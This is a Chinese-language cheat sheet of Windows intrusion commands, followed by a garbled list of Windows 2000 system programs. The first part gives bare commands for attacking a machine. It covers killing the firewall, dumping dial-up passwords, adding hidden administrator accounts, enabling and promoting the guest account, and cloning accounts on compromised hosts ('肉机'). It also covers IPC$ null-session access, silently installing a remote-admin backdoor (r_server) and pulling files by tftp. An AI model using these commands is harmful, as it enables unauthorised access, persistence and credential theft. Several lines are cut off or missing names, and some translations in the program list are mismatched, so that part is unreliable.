net share d:\web=e:\web /grant:zk0898,change
计算机管理:command  MMC
结束XP防火墙进程:net stop sharedaccess
查看ADSL帐号密码的代码:dialupass /allusers /stext "c:\
启动3389服务:net start TermService
关闭所有防火墙的代码: /c net stop sharedaccess
iis命令重启:iisreset /reboot
用CMD命令实现路由跟踪:tracert 域名(如:le)
查看中端(服务):net start
加用户:c:\winnt\system32>net user adminserver$ admin /add
提权限:net localgroup administrators adminserver$ /add  2180
查看用户net user
远程连接到主机CMD命令:telnet 主机IP
踢人:logoff ID
查看当前人:query user
打开telnet:net start telnet
删除共享: net share e123=e:\
删除共享: net share c$ /del
启用GUEST:net user guest /active:yes
为GUEST设密码:net user guest 888888
提升到管理员:net localgroup "Administrators" guest /add
超级用户隐藏器:c:\door adminserver$:admin
克隆帐号:ca \\IP 你建立的帐号 密码 肉机默认帐号 密码
ca \\ adminserver$ admin adminserver admin
c:\winnt\sc \\ config Alerter binpath= c:\winnt\
端口转向:f:\ "c:\ -v -l 开放的端口 -r 要转向的端口 ip"
net use \\对方IP\ipc$ "" /user:"administrator"
c:\radmin>net use \\a-01\ipc$ "12345" /user:administrator
c:\ramdin>copy \\a-01\admin$\system32
c:\ramdin> \\a-01\admin$\sytem32
c:\winnt\system32\>regedit /
c:\winnt\system32\> /install /silenec
net start r_server
copy \\对方IP\admin$\system32
c:\ \\IP ADMINISTRATOR "" 0 90
copy 文件名 \\IP\admin$\system32
c:\ \\Ip administrator "" 0 90
c:\telnet IP 90
r_server /install silence
c:\winnt\ /
netstat -an
/port:1024 /pass:1234 /save /silence
c:\winnt\system32\net start r_server
c:\winnt\ +h +h
c:\winnt\system32>net share
c:\winnt\system32>net share ipc$
c:\winnt\system32>net share admin$
先在本机开tftp服务 sqlexec
tftp-i IP c:\windows\system32\
win2000命令集 > accessibility wizard for walking you through setting up your machine for your mobility needs. 辅助工具向导
< > acs setup dcom server executable
< > direct show setup tool 直接显示安装工具
< > allows programs to open data in specified directories as if they were in the current directory. 允许程序打开制定目录中的数据
< > network display and modify ip - hardware addresses 显示和更改计算机的ip与硬件物理地址的对应列表
< > at is a scheduling utility also included with unix 计划运行任务
< > displays statistics for atm call manager. atm调用管理器统计
< > display and modify attributes for files and folders 显示和更改文件和文件夹属性
< > used to check and repair windows file systems 检测修复文件系统
< > automates the file system conversion during reboots 在启动过程中自动转化系统
< > automates the file format process during reboots 在启动过程中格式化进程
< > used for formatting long file names 使用长文件名格式
< > boot acceptance application for registry
< > , a program included in windows 2000 that notifies the system that startup was successful. can be run on a local or remote computer. 通报启动成功
< > displays or modifies access control lists (acls) of files. 显示和编辑acl
< > windows calculators 计算器
< > windows cd player cd播放器
< > change { user | port | logon } 与终端服务器相关的查询
< > character map 字符映射表
< > same as using "change logon" 启动或停用会话记录
< > same as using "change port" 改变端口(终端服务)
< > same as using "change user" 改变用户(终端服务)
< > check the hard disk for errors similar to scandisk 3 stages must specify a drive letter 磁盘检测程序
< > same as using chkdsk but for ntfs ntfs磁盘检测程序
< > component of ci filer service 组成ci文档服务
< > displays or alters the encryption of directories [files] on ntfs partitions. 在ntfs上显示或改变加密的文件或目录
< > content index -- it's the content indexing service for i 索引内容
< > convertor 变换
< > disk cleanup, popular with windows 98 磁盘清理
< > sql server client network utility sql客户网络工具
< > clipboard viewer for local will allow you to connect to other clipboards 剪贴簿查看器
< > start the clipboard server 运行clipboard服务
< > clspack used to create a file listing of system packages 建立系统文件列表清单
< > display a cluster in a domain 显示域的集
_cmd_.exe > famous command prompt 没什么好说的!
< > connection manager auto-download 自动下载连接管理
< > connection manager 连接管理器
< > connection manager monitor 连接管理器监视
< > connection manager profile manager 连接管理器配置文件安装程序
< > about cluster server 集
< > comclust add, remove, or join a cluster. 比较两个文件和文件集的内容*
< > displays or alters the compression of files on ntfs partitions. 显示或改变ntfs分区上文件的压缩状态
< > console ime ime控制台
< > starts the control panel 控制面板
< > convert file system to ntfs 转换文件系统到ntfs
< > converts ms iis log files 转换iis日志文件格式到ncsa格式
< > copy profiles 转换显示模式
< > ms windows s host version 5.1 较本宿主版本
< > client server runtime process 客户服务器runtime进程
< > comma separated variable import/export utility 日至格式转换程序
< > 和terminal server相关
< > display the current dcom configuration. dcom配置属性
< > ?
< > promote a domain controller to adsi ad安装向导
< > display dde shares on local or remote computer dde共享
< >
< > runs debug, a program testing and editing tool. 就是debug啦!
< > defrag fat file system fat分区磁盘碎片整理程序
< > defrag ntfs file system ntfs分区磁盘碎片整理程序
dfs_cmd_.exe > configures a dfs tree 配置一个dfs树
< > distributed file system initialization 分布式文件系统初始化
< > distributed file system server 分布式文件系统服务器
< > ms cabinet maker 制作cab文件
< > starts physical disk performance counters 磁盘性能计数器
< > dllhost is used on all versions of windows 2000. dllhost is the hedost process for all com+ applications. 所有com+应用软件的主进程
< >
< > disk manager service 磁盘管理服务
< > part of disk management 磁盘管理服务的一部分
< > dns applications dns
< > recalls windows command lines and creates macros 命令行创建宏
< > dos ex
tender dos扩展
< > direct play helper 直接运行帮助
< > dr watson for 2000 fault detector 华生医生错误检测
< > dr watson for 2000 viewer and configuration manager 华生医生显示和配置管理
< > installs mdtc
< > windows 2000 dvd player dvd播放
< > direct-x diagnostics direct-x诊断工具
< > line-oriented text editor. 命令行的文本编辑器(历史悠久啊!)
< > line-oriented text editor. 命令行的文本编辑器(历史悠久啊!)
< > ms database utility ms数据库工具
< > private character editor ture type造字程序
< > windows 2000 event viewer 事件查看器
evnt_cmd_.exe > event to trap translator; configuration tool
< > event to trap translator setup
< > converts exe to binary format 转换exe文件到二进制
< > expand files that have been compressed 解压缩
< > cab file extraction utility 解cab工具
< > fastopen tracks the of files on a hard disk and stores the information in memory for fast access. 快速访问在内存中的硬盘文件
< > fax cover page editor 传真封面编辑
< > display fax queue 显示传真队列
< > fax wizard for sending faxes 发送传真向导
< > starts fax server 启动传真服务
< > compares two files or sets of files and their differences 比较两个文件的不同
< > searches for a text string in file or files 查文件中的文本行
< > searches for strings in files 查文件中的行
< > fingers a user and displays statistics on that user finger一个用户并显示出统计结果
< > fix mapi files 修复mapi文件
< > enable or disable temporally directories 允许或者禁用临时文件目录
< > display fonts in a font file 显示字体文件中的字体
< > forces a file to start in dos mode. 强制文件在dos模式下运行
< > popular windows game 空当接龙
< > file transfer protocol used to transfer files over a network connection 就是ftp了
< > graphic device interface 图形界面驱动
< >
< > program manager group convertor 转换程序管理员组
< > displays help for windows 2000 commands 显示帮助
< > display hostname for machine. 显示机器的hostname
< > ie5 user install tool ie5用户安装工具
< > customize folder wizard 自定义文件夹向导
< > create and setup packages for install 穿件安装包
< > restart iis admin service 重启iis服务
< > keyboard language indicator applet 键盘语言指示器
< > windows 2000 ip configuration.
< > ip security monitor ip安全监视器
< > ipx routing and source routing control program ipx路由和源路由控制程序
< > setup ftp for wireless communication 无线连接
< > intersite messaging service 安装或者删除service control manager中的服务
< > microsoft debugger for 4的调试器
< > convert a jet engine database 转换jet engine数据库
< > compact jet database. 压缩jet数据库
< > command-line loader for 的命令行装载者
< > core component for windows 2000 2000的核心组件
< > change label for drives 改变驱动器的卷标
< > license compliance wizard for local or remote systems. 许可证符合向导
< > ldif cmd line manager ldif目录交换命令行管理
< > terminal server license manager 终端服务许可协议管理
< > display connection status lights 显示连接状况
< > windows 2000 license manager 2000许可协议管理
< > start the license server 启动许可协议服务器
< >
< > rpc locator 远程定位
< > load perfmon counters 调用性能计数
< > log current user off. 注销用户
< > displays status of a remote lpd queue 显示远端的lpd打印队列的状态,显示被送到基于unix的服务器的打印任务
< > send a print job to a network printer. 重定向打印任务到网络中的打印机。通常用于unix客户打印机将打印任务发送给连接了打印设备的nt的打印机服务器。
< > lsa executable and server dll 运行lsa和server的dll
< > specifies the new dns domain for the default server 指定默认server新的dns域
< > used for managing macfiles 管理macfiles
< > used to magnify the current screen 放大镜
< > ms cabinet maker 制作cab文件
< > machine debug manager 机器调试管理
< > display current memory stats 显示内存状态
< > migrate passwords. 迁移密码
< > microsoft management console 控制台
< > netmeeting remote desktop sharing netmeeting远程桌面共享
< > manage synchronization. 同步目录管理器
< > creates, s, or lists a volume mount point. 创建、删除或列出卷的装入点。
< > ms media player 媒体播放器
< > multiple provider notification application 多提供者通知应用程序
< >
< > ms message queue backup and restore utility 信息队列备份和恢复工具
< > msmq exchange connector setup 信息队列交换连接设置
< > msmq migration utility 信息队列迁移工具
< > ?
< > multicast routing using snmp 使用snmp多点传送路
